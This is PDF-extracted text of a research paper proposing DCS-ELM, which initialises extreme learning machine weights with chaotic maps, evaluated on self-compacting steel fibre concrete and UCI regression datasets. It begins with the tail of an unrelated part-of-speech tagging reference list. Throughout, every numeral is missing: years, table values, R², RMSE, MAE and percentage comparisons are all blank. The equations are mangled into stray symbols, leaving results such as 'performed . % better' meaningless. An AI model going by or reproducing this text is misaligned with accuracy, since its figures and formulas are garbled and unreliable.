unsupervised part-of-speech tagging. in proceed- ings of the joint conferenceof the th annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natu- ral language processing (acl-ijcnlp), pages – . sujith ravi, jason baldridge, and kevin knight. a. minimized models and grammar-informed initializa- tion for supertagging with highly ambiguous lexicons. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . sujith ravi, ashish vaswani, kevin knight, and david chiang. b. fast, greedy model minimization for unsupervised tagging. in proceedings of the rd in- ternational conference on computational linguistics (coling), pages – . roi reichart, raanan fattal, and ari rappoport. . improved unsupervised pos induction using intrinsic clustering quality and a zipfian constraint. in proceed- ings of the fourteenth conference on computational natural language learning, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma, usa. kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in advances in neural information processing systems (nips), pages – . dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc osman altay, mustafa ulas and kursat esat alyamac firat university, elazig, turkey abstract extreme learning machine (elm) algorithm is widely used in regression and classification problems due to its advantages such as speed and high-performance rate. different artificial intelligence-based optimization methods and chaotic systems have been proposed for the development of the elm. however, a generalized solution method and success rate at the desired level could not be obtained. in this study, a new method is proposed as a result of developing the elm algorithm used in regression problems with discrete-time chaotic systems. elm algorithm has been improved by testing five different chaotic maps (chebyshev, iterative, logistic, piecewise, tent) from chaotic systems. the proposed discrete-time chaotic systems based elm (dcs-elm) algorithm has been tested in steel fiber reinforced self- compacting concrete data sets and public four different datasets, and a result of its performance compared with the basic elm algorithm, linear regression, support vector regression, kernel elm algorithm and weighted elm algorithm. it has been observed that it gives a better performance than other algorithms. subjects artificial intelligence, data mining and machine learning, data science keywords extreme learning machine, discrete-time chaotic systems, chaotic maps, regression algorithm, sfrscc introduction feed-forward neural networks have been widely used since they were proposed (rumelhart, hinton & williams, ). traditional feed-forward neural networks generally use the first-order gradient method to optimize parameters. feed-forward neural networks suffer from problems such as low convergence and local minimums (huang et al., ). to deal with this problem, researchers have proposed different methods. these include feed-forward artificial neural network models developed with optimization methods such as artificial bee colony (karaboga, akay & ozturk, ), hybrid particle swarm optimization (al-kazemi & mohan, ), differential evolution (ilonen, kamarainen & lampinen, ) and genetic algorithm (montana & davis, ) during training. however, these methods still cannot provide the global optimal solution and need to be improved. lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. as a result, the extreme learning machine (elm) algorithm has emerged and elm algorithm has been proposed by huang, zhu & siew ( ). elm is used to train how to cite this article altay o, ulas m, alyamac ke. . dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author osman altay, oaltay@firat.edu.tr academic editor ka-chun wong additional information and declarations can be found on page doi . /peerj-cs. copyright altay et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:oaltay@�firat.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ single-layer feed-forward neural networks (slfns). it has been shown in various articles that the elm algorithm provides a better global optimal solution when compared to traditional feed-forward neural networks. theoretical studies have shown that even with randomly generated hidden nodes, elm retains universal convergence ability over slfns. different versions of the elm algorithm developed with different optimization methods and chaotic systems have been proposed in order to give a better global optimum solution. in , zhu et al. ( ) proposed the evolutionary elm algorithm using the differential evolutionary algorithm method. an elm algorithm using the particle swarm optimization method was proposed by xu & shu ( ). in addition to these, an elm algorithm developed by using different evolutionary optimization algorithms has also been proposed (zhu et al., ; xu & shu, ; silva, pacifico & ludermir, ). in addition to artificial intelligence-based optimization algorithms, there is also an elm algorithm developed using chaotic systems (huang et al., ; yang, wang & yuan, ). chaotic systems have also been used to develop optimization methods used in the elm algorithm. examples of these are the chaotic salp swarm optimization method (mohanty et al., ) and the elm algorithm improved by the chaotic moth-flame optimization method (wang et al., ). in this study, assignment of weight values and bias values was based on a determination using chaotic maps, not randomly. in the basic elm algorithm, weight and bias values are assigned randomly. the random selection of bias and weight values seems to be the biggest obstacle to achieving the desired global optimum solution as a result of insufficient dispersion of the distributions. this causes repetition and generation of the same values when high values are needed due to the irregular operation of the random command (yang, wang & yuan, ; mohanty et al., ; wang et al., ). chaotic system classes can be listed as discrete time, continuous time, time delay and hyper-chaotic systems. each of these chaotic classes of systems has its own advantages and disadvantages. discrete-time chaotic systems are used to determine the weight and bias values. discrete-time chaotic systems have a significant advantage over other chaotic system models due to their high performance in computer applications with their simple mathematical models. it is aimed to find the best bias and weight parameters by using discrete-time chaotic systems. it was observed that the proposed algorithm in the study achieved better results when compared with the basic elm algorithm, linear regression (lr), support vector regression (svr), kernel elm (kelm) and weighted elm (welm). in particular, the proposed algorithm has found a better and generalized solution in data sets where the number of hidden neurons increases and long training period. a discrete-time chaotic systems-based extreme learning machine (dcs-elm) algorithm has been proposed using discrete-time chaotic systems to improve the performance of the extreme learning machine algorithm. in the proposed algorithm, chebyshev, iterative, logistic, piecewise and tent map discrete-time chaotic systems are used. the proposed dcs-elm algorithm has been tested in different data sets and it has been found to give better results in most of them. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extreme learning machine feed-forward neural networks are widely used in many different areas due to their capabilities. the first is to predict nonlinear mapping methods using direct input samples. the second is; it can offer models for natural and artificial classes. lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. as a result, the elm algorithm has emerged (huang, zhu & siew, ). traditionally, all parameters of feed forward networks have to be set (gurgenc et al., ). for this reason, there is a dependency relationship between bias and weight values between different layers. gradient descent based methods are mainly used in various learning algorithms of feed forward neural networks. gradient descent based methods are sometimes very slow or can easily approach the local minimum. too many iterations may be required to achieve better learning. feed forward networks can be thought of as a linear model after the input weights and hidden layer trends are randomly selected. output weights of feedforward networks can be determined analytically by simple generalized inverse study of hidden layer output matrices. the exit logic of elm is also based on this situation and it has been shown in different data sets that it is a much faster and generalized model compared to traditional artificial neural networks (huang, zhu & siew, ). gradient-based solution the gradient-based solution has traditionally been used to train single-hidden layer feed forward neural networks. specifically, it is used to find the values of ~wi; ~bi; ~b; i ¼ð ; . . . ; ~nÞ (huang, zhu & siew, ) and its shown in eq. ( ). khð~w ; . . . ; ~w~n; ~b ; . . . ; ~bnÞb � tk ¼ min wibibkh ~w ; . . . ; ~w~n; ~b ; . . . ; ~bn � � b � tk ( ) this corresponds to the minimum value of the cost function (eq. ( )); e ¼ xn j¼ x~n i¼ big wi � xj þ bi � � � tj � � ( ) if the h value is unknown in the gradient-based learning algorithm, the algorithm usually starts looking for the minimum value of hb � t. in the gradient-based minimization process, the weights wi; bið Þ and the bias value are expressed as bi. w parameter is iteratively adjusted as eq. ( ) (huang, zhu & siew, ). wk ¼ wk� � n @e wð Þ @w ( ) here n is learning rate. the learning algorithm popularly used in feedforward neural networks is a back propagation learning algorithm that can be efficiently calculated by altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the propagation of gradients from output to input. there are several problems with the back propagation learning algorithm (huang, zhu & siew, ; ulas et al., ); � when the learning rate n value is small, the learning algorithm converges very slowly. when the value of n is large, the algorithm becomes unstable and diverges. � one of the factors affecting the backpropagation learning algorithm is the presence of local minimums. it is not desired that the learning algorithm stop at the local minimum instead of the global minimum. � artificial neural network; he may have over-trained or poor generalization performance using the back propagation learning algorithm. therefore, valid and appropriate stopping methods are required in the cost function reduction procedure. � gradient-based learning takes a lot of time in most applications. in the elm algorithm proposed to solve these problems in gradient-based algorithms, these problems have been eliminated and a more efficient learning algorithm is obtained for feed-forward neural networks (huang, zhu & siew, ). least squares norm unlike traditional function approximation theories that require adjusting input weights and hidden layer bias, input weights and hidden layer bias values can be assigned randomly only if the activation function is infinitely different. contrary to the common understanding that all parameters of feedforward neural networks need to be tuned, the input weights and bias values in the hidden layer do not need to be adjusted, and the hidden layer output matrix h can actually remain unchanged. the linear system is the analysis of hb ¼ t with the least squares norm b̂. the solution for this is given in eq. ( ). h w ; . . . ; w�n; b ; . . . ; nn̂ � � b̂ � t ¼ min b h w ; . . . ; w�n; b ; . . . ; nn̂ � � b � t ( ) if the n̂ number of hidden nodes is equal to the n number of samples, and the h matrix is square and reversible, the input weight vectors wi and hidden bias values bi can be chosen randomly. however, in most real problems, the number of hidden nodes is much less than the number of different training instances. h is a non-square matrix. there may be conditions that cannot be met at hb ¼ t. the smallest norm leasts squares solution of linear system is given in the eq. ( ). b ¼ h�t ( ) here, the inverse of the h matrix is taken using moore–penrose, h�. in short, elm, in a given training set @ ¼ xi; tið Þ k xi rn; ti rm; i ¼ ; . . . ; nf g, activation function g xð Þ and hidden nodes ~n; step : assign randomly; weight wi and bias value bi, i ¼ ; . . . ; ~n. step : compute the hidden layer output matrix h. step : calculate the output weight b ¼ h�t, t ¼ t ; . . . ; tn½ �t. the inverse of the h matrix is taken using moore–penrose h�. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in summary, in the elm algorithm; it is randomly generated with the weight and bias values adjusted. traditional feed forward neural networks train the network recursively, while in the elm algorithm, the process is done analytically (bilhan et al., ). n the elm algorithm, moore–penrose generalized inversed has been used to eliminate the disadvantages of recursive learning algorithms (altay & ulas, ). in this way, a nonlinear system has been transformed into a linear system (huang, zhu & siew, ; huang et al., ). the basic representation of the elm algorithm is given in fig. . activation function different activation functions are used in elm as in artificial neural networks. there is no input information about which activation function will be used according to the problem. activation functions are completely determined by trial and error methods. hard limit, sine and sigmoid activation functions were used in the dcs-elm algorithm suggested in the study. hard limit activation function is shown in eq. ( ) (huang et al., ). g a; b; xð Þ ¼ ; if a � x � b � ; otherwise � ( ) chaos theorem chaos has been in every event since the existence of the world. chaos basically has a certain stable and unique structure. chaotic systems are able to be stable as long as they can figure basic representation of elm. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ withstand different disturbing effects from the outside of their own disorder (baykal & beyan, ). there are differences between chaotic systems and random systems. although chaos and random systems are perceived as the same by many, there is a very basic and distinctive difference between them. this difference is that chaotic systems have an order in disorder. after the concept of chaos emerged, people working in this field regarded order as spontaneous systems in chaotic systems and observed that irregular behavior was a creative process (baykal & beyan, ). chaotic systems can be defined as systems with unpredictable and random behavior with the shortest definition. the most basic feature of chaos is that it depends on the initial conditions. in a chaotic system, although the initial conditions are very close to each other, its orbits have no relation with each other and the orbits diverge from each other. there is very little difference between very close values that occur in initial conditions and this difference can be considered as measurement error. in contrast, chaotic systems increase exponentially and the state of the system becomes indeterminable after a short time. chaotic systems are deterministic, contrary to popular belief, and should not be confused with stochastic systems. in a system, chaos is not a random external effect, but the internal dynamics of the system itself (baykal & beyan, ; ozer, ). in order for a systemic behavior to be called chaotic, it must comply with the following conditions. � it must be sensitive to the starting conditions, that is to say excessively dependent, � it must contain a nonlinear element, � discrete-time systems should have at least a first order, continuous time systems should have at least a third order differential equation. chaos theory has a much broader structure than that summarized here. there are many derivatives of chaotic systems. these chaotic system classes; it can be listed as discrete time, continuous time, time delay and hyper chaotic systems. each of these chaotic classes of systems has its own advantages and disadvantages. discrete-time chaotic systems have a significant advantage over other chaotic system models due to their high performance in computer applications with their simple mathematical models. because of these advantages, we focused on discrete-time chaotic systems. chaotic maps and their equations used in this study are listed in table and fig. includes sample distribution charts of chaotic maps. proposed dcs-elm recently, chaotic number sequences replacing random number sequences have been used in secure communication (caponetto et al., ), improving the performance of optimization methods (alatas, ; altay & alatas, ), artificial neural networks (nozawa, ) and nonlinear circuits (arena et al., ). more successful results have been obtained in some applications. the parts to be determined by the user in the basic elm algorithm are determined as the activation function and the number of hidden layers. elm algorithm randomly altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generates input weights and bias value. as a result of the random generation of these values, the distribution of the values is not good, and the desired performance cannot be obtained from the elm algorithm from time to time. the basic elm algorithm is shown in table . in the proposed algorithm, input weights and bias values are created by using chaotic maps instead of random. in this way, it is aimed to eliminate the disadvantages caused by random generation. the flow of the proposed dcs-elm is given in table . performance of the proposed algorithm according to elm and basic machine learning algorithm is shown in the next sections. -k cross validation in the -k cross validation method, the data set is primarily randomly distributed. then the data set was divided into parts. while each piece was used as a test data set, the remaining pieces were used as a training set, respectively. with the -k cross validation method, more consistent results can be obtained by using each data in the data set as test data. a simple representation of the -k cross validation method is given in the table . evaluation metrics in the study, using evaluation criteria are r-squared, root mean absolute error (rmse) and mean absolute error (mae). the equations of the evaluation criteria used are expressed as follows: r ¼ � p j tj � oj � � p j tj � t̂ � � ! ( ) table equations and parameters of chaotic maps. chaotic maps equations parameters chebyshev map xnþ ¼ cos kcos� xnð Þ – iterative map xnþ ¼ sin ap xn � � a ¼ : logistic map xnþ ¼ axn � xnð Þ a ¼ piecewise map xnþ ¼ xn p ; � xn , p xn � p : � p ; p � xn , : � p � xn : � p ; : � xn , � p � xn p ; � p � xn < >>>>>>>>< >>>>>>>>: p ¼ : tent map xnþ ¼ xn : ; xn � : xnð � xnÞ; de�gilse: >< >: – altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rmse ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi p � � � x j tj � oj s ( ) mae ¼ p xp i¼ ti � oj ( ) where o are the experimental values, t are the predicted values of the machine learning algorithms, t̂ are the average of all experimental values and p are the number of samples. figure distributions of chaotic maps. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ datasets in this section, the data sets used to evaluate the performance of the proposed dcs-elm algorithm and other algorithms are explained. first, sfrscc data set is explained and then public data sets are explained. self-compacting steel fiber concrete in the application of the proposed algorithm, a special type of concrete, self-compacting steel fiber concrete is used. a total of different concrete tests were selected from the fresh and hardened concrete tests. v-funnel, t and slump-flow tests used to determine fresh concrete performance and concrete compressive strength tests used to determine the performance of hardened concrete were used. in the selection of the data set, machine learning methods have not been applied before, they have the same number of input table basic elm algorithm. elm in a given training set @ ¼ xi; tið Þ k xi rn; ti rm; i ¼ ; . . . ; nf g, activation function g xð Þ and hidden nodes ~n; step : assign randomly; weight wi and bias value bi, i ¼ ; . . . ; ~n. step : compute the hidden layer output matrix h. step : calculate the output weight b ¼ h�t, t ¼ t ; . . . ; tn½ �t. the inverse of the h matrix is taken using moore–penrose h�. table dcs-elm algorithm. dcs-elm in a given training set @ ¼ xi; tið Þ k xi rn; ti rm; i ¼ ; . . . ; nf g, activation function g xð Þ and hidden nodes ~n; step : assign using chaotic maps; weight wi and bias value bi, i ¼ ; . . . ; ~n. step : compute the hidden layer output matrix h. step : calculate the output weight b ¼ h�t, t ¼ t ; . . . ; tn½ �t. the inverse of the h matrix is taken using moore–penrose h�. table -k cross-validation simple representation. test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test train train train train train train train train train train test altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameters, but the effect values of the parameters are different according to the experiments, there are not enough data sets in the literature and it is more difficult to obtain a successful performance with machine learning methods compared to different data sets. the data sets used were obtained from our own experiments and theses and articles obtained from the literature. data sets were used in the models designed for v-funnel, data sets in the model designed for t , data sets in the model designed for slump-flow, and data in the model designed for compressive strength. the data in table are obtained from the experimental studies and the studies in table are obtained from the literature. the input parameters in the data set are cement (c), silica fume+silica powder+stone fume (s), fly ash (fa), maximum aggregate size (dmax), fine aggregate (fi), coarse aggregate (ca), water (w), chemical additive (a), amount of steel fiber (stf), diameter of steel fiber (fd) and length of steel fiber (fd). the output parameters in the data set are v-funnel (vf), t , slump-flow (sf) and compressive strength (fc). silica fume, silica powder and stone fume are reduce the workability of the fresh concrete takes as group (altay, ulas & alyamac, ). the effect of this group on the performance of concrete that has been hardened before days is negligible. public datasets the energy, house and servo data sets obtained from public data set sharing platform uci are explained (dua & graff, ). energy energy data set consists of inputs and outputs. input values consist of relative compactness, surface area, wall area, roof area, overall height, orientation, glazing area and glazing area distrubution. output values consist of heating load and cooling load. it has been examined separately for two different output values. there are sample data in the data set created by considering the output variables of different buildings (tsanas & xifara, ). house in the house data set, between june and may , data from different regions is beyond the supply and demand circle. there are a total of sample data in the data set. table data from experiment, input and output parameters of sfrscc for v-funnel, t , slump-flow and compressive strength models. mix code c kg/m s kg/m dmax (mm) fi kg/m ca kg/m w l a l stf kg/m fd mm fl mm vf (s) t (s) sf (cm) fc (mpa) c- . . . . c- . . . . . c- . . . . . c- . . . . . c- . . . . c- . . – . . c- . . . . c- . . . – – – . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table data from literature, input and output parameters of sfrscc for v-funnel, t , slump-flow and compressive strength models. ref c kg/m s kg/m fa kg/m dmax (mm) fi kg/m ca kg/m w l a kg/m stf kg/m fd mm fl mm vf s t s sf cm fc mpa korkmaz ( ) . . . . . . . . nis ( ) . . . . . . rao & ravindra ( ) . . . . . . . . . . . . . bozkurt ( ) . . . . . . . kassimi ( ) . . . . . . . . tezel ( ) . . . . . – sahmaran & yaman ( ) . . . . . – sahmaran, yurtseven & yaman ( ) . . . . . . . corinaldesi & moriconi ( ) , . – gencel et al. ( ) . . . . . . . . . . . – korkut et al. ( ) . . . . . . . . . – berbergil ( ) . . . . – . . yıldırım, sertbaş & berbergil ( ) . . . . . – – . . dinç ( ) . . . – – el-dieb & taha ( ) . . – . – deeb ( ) . – – ouedraogo ( ) , . . . . – . . . . pająk & ponikiewski ( ) . . . – . . frazão et al. ( ) . . . – . . – torrijos, barragan & zerbino ( ) . – . – majdzadeh ( ) . . . . . . . – – – jansson et al. ( ) . . – – – long et al. ( ) . . . – – – . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the input parameters of the data set consist of different parameters: transaction date, age, distance to the nearest mrt station, the number of convenience stores in the living circle on foot and the geographic coordinate (latitude and longitude). the exit value is the price of the house (yeh & hsu, ). servo there are sample data in the servo data set. the input parameters of the data set are engine, screw, pgain and vgain. output values constitute the rise time of the servomechanism. the dataset created by karl ulrich covers a nonlinear phenomenon (quinlan, , ). results and discussion in this study, the dcs-elm algorithm, which was proposed for the first time using chaotic maps, was tested in different regression datasets. in this section, first of all, the performances of dcs-elm and other algorithms proposed on public data sets were examined and compared. then, performances of dcs-elm and other algorithms in sfrscc datasets were examined and compared. finally, a general evaluation of dcs-elm and other algorithms proposed on different data sets was made according to the rmse value. performance experiment results on public data sets the proposed dcs-elm algorithm using different chaotic maps on different public data sets is compared with the, lr (altay et al., ), svr (altay et al., ), welm (ulas et al., ), kelm (ulas et al., ; yang et al., ) and basic elm algorithm (cao et al., ). lr and svr algorithms are used with basic property parameters. the number of input, output, activation function and hidden neuron used in dcs-elm, basic elm, welm and kelm are given in the tables and . the -k cross validation method was used to test the designed models. the basic elm, welm and kelm algorithms were run times and the r , rmse and mae values were averaged. table shows the results of basic elm, lr, svr, welm, kelm and dcs-elm algorithms for public data sets. a new approach for the sfrscc using dcs-elm sfrcscc’s fresh and hardened concrete experiments performances were predicted using the proposed dcs-elm algorithm using the basic elm algorithm and different chaotic maps. parameters used in elm and dcs-elms are taken exactly the same in all designed models in order to ensure a healthy comparison. the input, output, activation function and the number of hidden neurons of the basic elm algorithm, welm and dcs-elm are shown in table . kelm algorithm architecture shown in table . in order to compare the elm algorithm with the chaotic map-based elm algorithms, the elm algorithm was run times and the evaluation criteria were averaged. all designed models were tested using the -k cross validation test method. r , rmse and mae values were calculated separately for each model. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fig. , the elm algorithm of the v-funnel experiment and the prediction and experimental values of different dcs-elm algorithms are given, and fig. shows the differences between the prediction and experimental values. as it can be understood from fig. and fig. , elm algorithm using iterative maps showed the best performance. dcs-elm algorithm using chebyshev and logistic maps follow dcs-elm using iterative maps. figure shows the elm algorithm of the t experiment and the prediction and experimental values of different dcs-elm algorithms. figure shows the differences between prediction and experimental values. as seen in figs. and , the algorithms have shown similar performances to each other. logistic map-based dcs-elm algorithm table results of public datasets. em lr svr welm k = kelm k = elm k = dcs-elm chebyshev dcs-elm iterative dcs-elm logistic dcs-elm piecewise dcs-elm tent energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . house r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . servo r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . table architecture of kelm. kernel parameter activation function output neuron input neuron energy rbf kernel energy rbf kernel house rbf kernel servo rbf kernel table architecture of elm, dcs-elm and welm. hidden neuron activation function output neuron input neuron energy sine energy sine house hardlim servo sigmoid altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ has succeeded in producing the best predictive values. the piecewise map based dcs-elm algorithm has performed very close to the logistic map based dcs-elm algorithm. in fig. , the elm algorithm of the slump-flow experiment and the prediction and experimental values of different dcs-elm algorithms are given and the differences between the prediction and experimental values are shown in fig. . as can be seen from figs. and , the most successful performance in the slump-flow experiment was shown by the dcs-elm algorithm using iterative map. the dcs-elm algorithm using piecewise map produced predictive values close to the dcs-elm algorithm using iterative map. tent and logistic map-based dcs-elm algorithm produced more distant values in predicted values than expected experimental values. figure shows the elm algorithm of the compressive strength test and the prediction and experimental values of different dcs-elm algorithms. figure shows the differences between prediction and experimental values. as can be seen from figs. and , the methods in the compressive strength test have produced predictive values that are not far from each other. the dcs-elm algorithm, which uses piecewise map, has managed to produce relatively better predictive values. r , rmse and mae values for basic elm and dcs-elm are given separately in table . in the v-funnel experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. iterative map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistic map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. table parameters of the elm, welm and dcs-elm for sfrscc. hidden neuron activation function output neuron input neuron vfunnel , hard limit t , hard limit slump-flow , hard limit fc , hard limit table parameters of the kelm for sfrscc. kernel parameter activation function output neuron input neuron vfunnel lin kernel t lin kernel slump-flow lin kernel fc lin kernel altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the iterative map-based dcs-elm algorithm obtained the values of . , . and . for r , rmse and mae values, respectively. logistic map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , figure experimental and predictive values of dcs-elm algorithm in the v-funnel experiment. (a) chebyshev. (b) itaretive. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . and . for r , rmse and mae values, respectively. tent map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. in the slump-flow experiment, the elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. iterative map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistic map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map-based dcs-elm figure differences between the experimental and predictive values of dcs-elm algorithm in the v-funnel experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm obtained values of . , . and . for r , rmse and mae values, respectively. in the compressive strength experiment, elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. chebyshev map-based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. the iterative map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. logistics map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae figure experimental and predictive values of dcs-elm algorithm in t experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ values, respectively. the piecewise map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. tent map based dcs-elm algorithm obtained values of . , . and . for r , rmse and mae values, respectively. figure shows the performances of elm and dcs-elm algorithms in different data sets according to the r value. in the v-funnel experiment, it is an iterative map-based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm performed . % better than the basic elm algorithm, % better than the tent map based dcs-elm algorithm, . % better than the piecewise map based dcs-elm algorithm, . % better than the chebyshev map based dcs-elm algorithm and . % better than the logistic map based dcs-elm algorithm. figure differences between the experimental and predictive values of dcs-elm algorithm in the t experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, it is the logistic map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than chebyshev map based dcs-elm algorithm, . % better than the tent map based dcs-elm algorithm, . % better than the iterative map based dcs-elm algorithm, . % better than the basic elm algorithm and . % better than the piecewise map based dcs-elm algorithm. figure experimental and predictive values of dcs-elm algorithm in the slump-flow experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the slump-flow experiment it is the iterative map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the logistic map-based dcs-elm algorithm, % better than the chebyshev map-based dcs-elm algorithm and . % better than the piecewise map-based dcs-elm algorithm. in the compressive strength experiment it is the iterative map based dcs-elm algorithm that gives the best result according to the r evaluation criteria. this algorithm has performed . % better than the basic elm algorithm, . % better than the tent map based dcs-elm algorithm, . % better than the logistic map based dcs-elm algorithm, . % better than chebyshev map based dcs-elm and . % better than the iterative map based dcs-elm algorithm. figure differences between the experimental and predictive values of dcs-elm algorithm in the slump-flow experiment. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the performances of elm and dcs-elm algorithms in different data sets according to the rmse value. in the v-funnel experiment, the iterative map- based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the logistic map-based dcs-elm algorithm, . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. figure experimental and predictive values of dcs-elm algorithm in compressive strength test. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the t experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the piecewise map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. in the slump-flow experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the logistic map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the chebyshev map-based dcs-elm 